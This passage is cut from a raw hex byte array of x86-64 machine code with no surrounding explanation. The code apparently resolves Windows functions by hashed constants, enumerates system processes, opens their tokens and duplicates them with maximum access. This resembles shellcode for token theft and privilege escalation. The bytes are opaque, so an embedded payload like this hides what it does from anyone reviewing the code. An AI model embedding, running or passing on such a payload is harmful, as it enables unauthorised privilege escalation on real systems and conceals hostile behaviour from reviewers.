xC1,0xE8,0xE0,0x1F,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x20,0x92,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8D,0x05,0x3D,0x92,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8D,0x45,0xE0,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x02,0x00,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0x90,0x31,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x4F,0x4C,0x8D,0x45,0xF0,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0x10,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9F,0x00,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x2C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x48,0x00,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x1A,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x18,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x15,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xD0,0x1E,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x41,0xB9,0x08,0x00,0x00,0x00,0x4C,0x8D,0x45,0x10,0xBA,0x05,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0x21,0x25,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0x28,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xC0,0x00,0x00,0x00,0x48,0x89,0x95,0xC8,0x00,0x00,0x00,0x44,0x89,0x85,0xD0,0x00,0x00,0x00,0x4C,0x89,0x8D,0xD8,0x00,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0xC7,0x45,0x4C,0x00,0x10,0x00,0x00,0x8B,0x45,0x4C,0x89,0x85,0x84,0x00,0x00,0x00,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0xC7,0x85,0x80,0x00,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0x20,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x28,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xF0,0x0F,0x11,0x45,0x00,0x0F,0x11,0x45,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xA3,0x90,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6A,0xE2,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xA4,0x97,0x06,0x9A,0x48,0x89,0xC1,0xE8,0x78,0xE0,0xFF,0xFF,0x48,0x89,0x45,0x78,0x48,0x83,0x7D,0x78,0x00,0x0F,0x84,0xF2,0x03,0x00,0x00,0x48,0x8D,0x55,0x68,0x48,0x8B,0x85,0xC0,0x00,0x00,0x00,0x4C,0x8B,0x45,0x78,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x75,0x05,0xE9,0xD6,0x03,0x00,0x00,0x8B,0x45,0x4C,0x89,0x85,0x84,0x00,0x00,0x00,0x8B,0x45,0x4C,0x89,0xC3,0x48,0x8B,0x05,0x63,0xFE,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x57,0xFE,0x00,0x00,0xFF,0xD0,0x48,0x89,0x85,0x90,0x00,0x00,0x00,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x0F,0x84,0x92,0x03,0x00,0x00,0x8B,0x55,0x4C,0x48,0x8D,0x4D,0x4C,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x49,0x89,0xC9,0x41,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x05,0x00,0x00,0x00,0xE8,0x64,0x20,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x79,0x78,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x4C,0x8B,0x95,0x84,0x00,0x00,0x00,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x69,0x6C,0x00,0x00,0x48,0x8B,0x05,0xDA,0xFD,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCF,0xFD,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x81,0xBD,0x80,0x00,0x00,0x00,0x23,0x00,0x00,0xC0,0x0F,0x84,0x2A,0xFF,0xFF,0xFF,0x81,0xBD,0x80,0x00,0x00,0x00,0x04,0x00,0x00,0xC0,0x0F,0x84,0x1A,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0xDF,0x02,0x00,0x00,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x48,0x89,0x85,0x88,0x00,0x00,0x00,0xC7,0x45,0xF0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x18,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x0C,0x00,0x00,0x00,0xC7,0x45,0xB8,0x02,0x00,0x00,0x00,0xC6,0x45,0xBC,0x00,0xC6,0x45,0xBD,0x00,0x48,0x8D,0x45,0xB4,0x48,0x89,0x45,0xE8,0x48,0x8B,0x85,0x88,0x00,0x00,0x00,0x48,0x8B,0x40,0x50,0x48,0x89,0x45,0x20,0x48,0x8D,0x4D,0x20,0x48,0x8D,0x55,0xF0,0x48,0x8D,0x45,0x60,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9F,0x1A,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0xDD,0x01,0x00,0x00,0x48,0x8B,0x45,0x60,0x48,0x8D,0x55,0x58,0x49,0x89,0xD0,0xBA,0x0A,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD6,0x1B,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0x9E,0x01,0x00,0x00,0x48,0x8B,0x45,0x58,0x48,0x8D,0x4D,0xC0,0x48,0x8D,0x55,0x50,0x48,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x02,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0xBA,0x00,0x00,0x00,0x02,0x48,0x89,0xC1,0xE8,0x67,0x21,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0x48,0x01,0x00,0x00,0x48,0x8B,0x45,0x50,0x48,0x8D,0x55,0x40,0x48,0x89,0xC1,0xE8,0x75,0x05,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x0F,0x84,0x0E,0x01,0x00,0x00,0x48,0x8B,0x45,0x50,0x48,0x8D,0x55,0x38,0x48,0x89,0xC1,0xE8,0x4A,0x0B,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x0F,0x84,0xD9,0x00,0x00,0x00,0x48,0x8B,0x55,0x68,0x48,0x8B,0x45,0x40,0x48,0x89,0xC1,0xE8,0xD8,0x08,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x74,0x6A,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x50,0x48,0x8D,0x55,0xB0,0x48,0x89,0xC1,0xE8,0xAA,0x09,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x74,0x4A,0x8B,0x45,0xB0,0x85,0xC0,0x74,0x43,0x48,0x8B,0x45,0x50,0x8B,0x8D,0xD0,0x00,0x00,0x00,0x48,0x8B,0x95,0xC8,0x00,0x00,0x00,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xD4,0x2C,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x74,0x18,0x48,0x8B,0x55,0x50,0x48,0x8B,0x85,0xD8,0x00,0x00,0x00,0x48,0x89,0x10,0xC7,0x85,0x9C,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0x38,0x48,0x85,0xC0,0x74,0x4D,0x48,0x8B,0x45,0x38,0x48,0x89,0xC1,0xE8,0x5A,0x6A,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0x38,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x69,0x00,0x00,0x48,0x8B,0x5D,0x38,0x48,0x8B,0x05,0x57,0xFB,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x53,0xFB,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x40,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5B,0xFB,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x83,0xBD,0x9C,0x00,0x00,0x00,0x00,0x75,0x14,0x48,0x8B,0x45,0x50,0x48,0x89,0xC1,0xE8,0xEA,0x19,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x58,0x48,0x89,0xC1,0xE8,0xD6,0x19,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x60,0x48,0x89,0xC1,0xE8,0xC2,0x19,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x83,0xBD,0x9C,0x00,0x00,0x00,0x00,0x75,0x24,0x48,0x8B,0x85,0x88,0x00,0x00,0x00,0x8B,0x00,0x85,0xC0,0x74,0x1A,0x48,0x8B,0x85,0x88,0x00,0x00,0x00,0x8B,0x00,0x89,0xC0,0x48,0x01,0x85,0x88,0x00,0x00,0x00,0xE9,0xB5,0xFD,0xFF,0xFF,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0x68,0x48,0x85,0xC0,0x74,0x10,0x48,0x8B,0x45,0x68,0x48,0x89,0xC1,0x48,0x8B,0x05,0xBB,0xFA,0x00,0x00,0xFF,0xD0,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x55,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x4B,0x8B,0x45,0x4C,0x89,0xC2,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE1,0x68,0x00,0x00,0x48,0x8B,0x05,0x52,0xFA,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x47,0xFA,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x48,0x81,0xC4,0x28,0x01,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xD5,0x8B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9C,0xDD,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x22,0x96,0xBC,0x93,0x48,0x89,0xC1,0xE8,0xAA,0xDB,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x0C,0x48,0x8B,0x45,0xF0,0xFF,0xD0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0x0F,0x11,0x45,0xC0,0x48,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x60,0xFF,0xFF,0xFF,0x0F,0x11,0x85,0x70,0xFF,0xFF,0xFF,0x0F,0x11,0x45,0x80,0x48,0x8B,0x45,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xA0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x80,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x88,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x0C,0x00,0x00,0x00,0xC7,0x45,0x98,0x02,0x00,0x00,0x00,0xC6,0x45,0x9C,0x00,0xC6,0x45,0x9D,0x00,0x48,0x8D,0x45,0x94,0x48,0x89,0x45,0x88,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0x8D,0x05,0x24,0x8A,0x00,0x00,0x48,0x89,0x85,0x50,0xFF,0xFF,0xFF,0x48,0x8D,0x05,0x3E,0x8A,0x00,0x00,0x48,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x8D,0x85,0x50,0xFF,0xFF,0xFF,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x02,0x00,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0x8B,0x29,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x0F,0x84,0xAA,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD0,0x48,0x8D,0x55,0xA0,0x48,0x8D,0x45,0xF0,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0E,0x16,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x88,0x81,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x0A,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4B,0x17,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x63,0x48,0x8B,0x45,0xE8,0x48,0x8D,0x8D,0x60,0xFF,0xFF,0xFF,0x48,0x8D,0x55,0xE0,0x48,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x02,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0xBA,0x00,0x00,0x00,0x02,0x48,0x89,0xC1,0xE8,0xE3,0x1C,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x2B,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xDD,0xF7,0xFF,0xFF,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x74,0x19,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x18,0x48,0x89,0x10,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x6C,0x16,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x57,0x16,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x15,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0xE8,0x3C,0x16,0x00,0x00,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x8D,0x05,0xC7,0x88,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8D,0x05,0x2C,0x89,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x10,0x41,0xB9,0x02,0x00,0x00,0x00,0x49,0x89,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x49,0x89,0x00,0x00,0x48,0x89,0xC1,0xE8,0x35,0xF6,0xFF,0xFF,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0x8D,0x05,0x21,0x89,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFB,0xF5,0xFF,0xFF,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x68,0x48,0x8D,0x6C,0x24,0x60,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x08,0x00,0x00,0x00,0x8B,0x45,0xD8,0x89,0x45,0xEC,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0xC0,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x63,0x88,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2A,0xDA,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x7F,0xE4,0xDE,0xE9,0x48,0x89,0xC1,0xE8,0x38,0xD8,0xFF,0xFF,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x1D,0x01,0x00,0x00,0x8B,0x45,0xD8,0x89,0x45,0xEC,0x8B,0x45,0xD8,0x89,0xC3,0x48,0x8B,0x05,0x49,0xF6,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x3D,0xF6,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xE9,0x00,0x00,0x00,0x44,0x8B,0x45,0xD8,0x48,0x8B,0x4D,0xF0,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xD8,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAD,0x1A,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x79,0x56,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xEC,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5D,0x64,0x00,0x00,0x48,0x8B,0x05,0xCE,0xF5,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC6,0xF5,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xE8,0x23,0x00,0x00,0xC0,0x0F,0x84,0x44,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xE8,0x00,0x78,0x5E,0xBA,0x44,0x00,0x00,0x00,0xB9,0x40,0x00,0x00,0x00,0x48,0x8B,0x05,0xAD,0xF5,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0x28,0x48,0x89,0x02,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x3B,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x10,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x4C,0x8B,0x4D,0xE0,0x49,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x44,0x00,0x00,0x00,0x41,0xFF,0xD1,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x15,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x49,0x48,0x83,0x7D,0xF0,0x00,0x74,0x42,0x8B,0x45,0xD8,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x92,0x63,0x00,0x00,0x48,0x8B,0x05,0x03,0xF5,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xFB,0xF4,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x2A,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x1E,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xEE,0xF4,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x28,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x68,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x61,0x86,0x00,0x00,0x48,0x89,0xC1,0xE8,0x28,0xD8,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x4F,0xB3,0x89,0x2E,0x48,0x89,0xC1,0xE8,0x36,0xD6,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5F,0x48,0x8D,0x55,0xE8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x7F,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3F,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x55,0x18,0x4C,0x8B,0x45,0xF8,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xF4,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0x48,0x8B,0x05,0x43,0xF4,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0x48,0x8D,0x45,0xF0,0x49,0x89,0xC0,0xBA,0x08,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xEB,0x12,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x76,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x55,0xE8,0x48,0x89,0xC1,0xE8,0xEF,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x65,0x12,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8